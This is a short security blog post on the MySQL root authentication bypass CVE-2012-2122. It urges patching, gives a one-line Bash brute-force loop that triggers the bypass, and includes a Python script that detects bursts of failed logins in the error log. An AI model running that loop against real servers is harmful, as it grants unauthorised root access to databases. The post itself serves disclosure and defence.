MySQL Remote Root Authentication Bypass (CVE-2012-2122)

A new vulnerability discovered in MySQL Server allows an attacker to gain remote root privileges. According to the original article posted on SC Magazine “Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.”

This critical vulnerability, CVE-2012-2122, has already been patched, so you have to update your MySQL server as soon as possible.

The Python script is still available on Exploit-DB and can be converted into a single-line Bash script:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 2>/dev/null; done

Patch your MySQL! :)
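
While the patch is being rolled out, the burst of failed logins that the loop above produces can be flagged in the server's error log. The following is an added example, not code from the original post or from Exploit-DB: it counts "Access denied" warnings per user and source host inside a sliding window. It assumes failed logins are written to the error log in the MySQL 5.x `log_warnings=2` format shown in the constructed sample; the function names, threshold and window are illustrative choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed error-log line format; adjust the regex to match your build.
DENIED = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)' \(using password: YES\)"
)
FMT = "%y%m%d %H:%M:%S"


def find_bursts(lines, threshold=50, window=timedelta(seconds=60)):
    """Return {(user, host): peak failures in any window} for pairs >= threshold."""
    events = defaultdict(list)
    for line in lines:
        m = DENIED.match(line)
        if m:
            ts = datetime.strptime(" ".join(m.group("ts").split()), FMT)
            events[(m.group("user"), m.group("host"))].append(ts)
    alerts = {}
    for key, stamps in events.items():
        stamps.sort()
        start = peak = 0
        for end, ts in enumerate(stamps):
            # Shrink the window from the left until it spans <= `window`.
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts


def sample_log():
    """Constructed sample: 300 root failures in 30 s, plus slow unrelated noise."""
    base = datetime(2012, 6, 11, 10, 15, 0)
    tail = "(using password: YES)"
    lines = ["120611 10:14:59 [Note] /usr/sbin/mysqld: ready for connections."]
    for i in range(300):
        ts = (base + timedelta(seconds=i // 10)).strftime(FMT)
        lines.append(f"{ts} [Warning] Access denied for user 'root'@'192.0.2.10' {tail}")
    for i in range(3):
        ts = (base + timedelta(minutes=5 * i)).strftime(FMT)
        lines.append(f"{ts} [Warning] Access denied for user 'admin'@'198.51.100.7' {tail}")
    return lines


if __name__ == "__main__":
    for (user, host), count in find_bursts(sample_log()).items():
        print(f"ALERT {count} failed logins for {user!r} from {host} within 60s")
```

An alert for the `root` account from a single remote host is a reason to check that server's patch level first and to review which hosts can reach the MySQL port at all.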



About the Author:

Andrea is a certified CISSP and OPST Security Expert with fourteen years of experience, encompassing SIEM, malware analysis, investigating security incidents, computer and network forensics, ISO 27001/NIST/COBIT audits and hardening of various devices. He also develops the FG-Scanner project and is a member of Clusit and ISC2 Italy.